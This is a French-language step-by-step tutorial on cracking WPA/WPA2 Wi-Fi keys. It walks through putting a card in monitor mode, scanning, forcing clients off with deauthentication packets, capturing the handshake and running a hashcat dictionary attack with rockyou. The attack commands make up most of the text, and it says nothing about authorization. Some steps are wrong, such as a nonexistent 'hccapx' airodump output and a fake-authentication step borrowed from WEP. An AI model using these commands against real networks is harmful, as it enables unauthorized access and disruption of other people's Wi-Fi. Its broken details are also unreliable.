Pour récupérer les données nécessaires pour casser une clé WPA (WPA2) hors-ligne, il faut capturer un handshake entre un client et le point d’accès (AP). Ce handshake contient les informations nécessaires pour forcer le calcul de la clé de chiffrement (PSK), ce qui permet de la casser ultérieurement avec des outils comme aircrack-ng, hashcat ou john the ripper.

Voici un tutoriel complet sous Linux pour capturer les données nécessaires à la crack offline d’une clé WPA/WPA2.

Matériel requis

  • Une carte réseau compatible avec le mode monitor (ex: Alfa AWUS036ACS, TP-Link TL-WN725N, etc.)
  • Un PC Linux (ou VM)
  • aircrack-ng (installé avec sudo apt install aircrack-ng)
  • airmon-ng, aireplay-ng, airodump-ng

Étapes du tutoriel

1. Activer le mode monitor

# Vérifier les interfaces réseau
iwconfig

# Démarrer l’interface en mode monitor (remplacer wlan0 par ton interface)
sudo airmon-ng start wlan0

Cela créera une nouvelle interface comme wlan0mon.

2. Scanner les réseaux Wi-Fi à proximité

sudo airodump-ng wlan0mon
  • Notez l’BSSID (adresse MAC du point d’accès) et le canal.
  • Exemple :
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH
00:11:22:33:44:55  -50      1234     5678    20   11   WPA2 CCMP PSK

3. Capturer le handshake

Maintenant, on va cibler un client connecté au réseau WPA, ou forcer une connexion via fake authentication.

Option A : Attendre qu’un client se connecte

# On capture les paquets sur le canal du réseau (ex: canal 6)
sudo airodump-ng -c 6 --band g -w capfile wlan0mon

Laissez cette commande tourner quelques minutes. Quand un client se connecte, un handshake est capturé.

Option B : Forcer un handshake via un client

Utilisez aireplay-ng pour forcer un client à se reconnecter :

# Lancer un fake authentification (remplacer BSSID par celui du réseau)
sudo aireplay-ng -1 0 -e "NomDuRéseau" -a 00:11:22:33:44:55 wlan0mon
01:23:45  Injection is working!

Ensuite, forcez un handshake :

# Forcer un deauth (déconnexion du client)
sudo aireplay-ng -0 1 -a 00:11:22:33:44:55 -c FF:EE:DD:CC:BB:AA wlan0mon

Remplacer FF:EE:DD:CC:BB:AA par l’adresse MAC du client.

4. Vérifier la capture

aircrack-ng capfile-01.cap
#  BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH
1  00:11:22:33:44:55  -50      1234     5678    20   11   WPA2 CCMP PSK

Choice: 1
1 handshake found

Cela signifie que le handshake est capturé. Le fichier capfile-01.cap contient tout ce qu’il faut.

Résultats à récupérer

  1. Le fichier .cap : contient le handshake.
  2. Le BSSID (adresse MAC du point d’accès).
  3. Le SSID (nom du réseau).
  4. Optionnel : le MAC du client.

Étapes pour casser la clé WPA hors-ligne

1. Convertir le fichier .cap

Avec hashcat

sudo aircrack-ng -J handshake.hc capfile-01.cap

Générer un fichier .hccapx

sudo airodump-ng -c 6 --band g --output-format hccapx -w result wlan0mon

2. Utiliser hashcat

hashcat -m 2500 -a 0 handshake.hc /chemin/vers/wordlist.txt
  • -m 2500 : type de hash WPA/WPA2
  • -a 0 : mode dictionnaire
  • /chemin/vers/wordlist.txt : wordlist

Astuce : Wordlist

Utilisez une wordlist comme :

https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

ou générez-en une avec cewl.

Résumé des outils

Outil Utilité
airodump-ng Scanner et capturer les paquets
aireplay-ng Forcer des handshakes
aircrack-ng Analyser et convertir les captures
hashcat Cassage de clé WPA hors-ligne
john Alternative à hashcat

Exemple complet

# Démarrer le mode monitor
sudo airmon-ng start wlan0

# Scanner
sudo airodump-ng wlan0mon

# Capturer sur canal 6
sudo airodump-ng -c 6 --band g -w capfile wlan0mon

# Forcer un handshake
sudo aireplay-ng -0 1 -a 00:11:22:33:44:55 -c FF:EE:DD:CC:BB:AA wlan0mon

# Convertir en hashcat
sudo aircrack-ng -J handshake.hc capfile-01.cap

# Cassage avec hashcat
hashcat -m 2500 -a 0 handshake.hc /usr/share/wordlists/rockyou.txt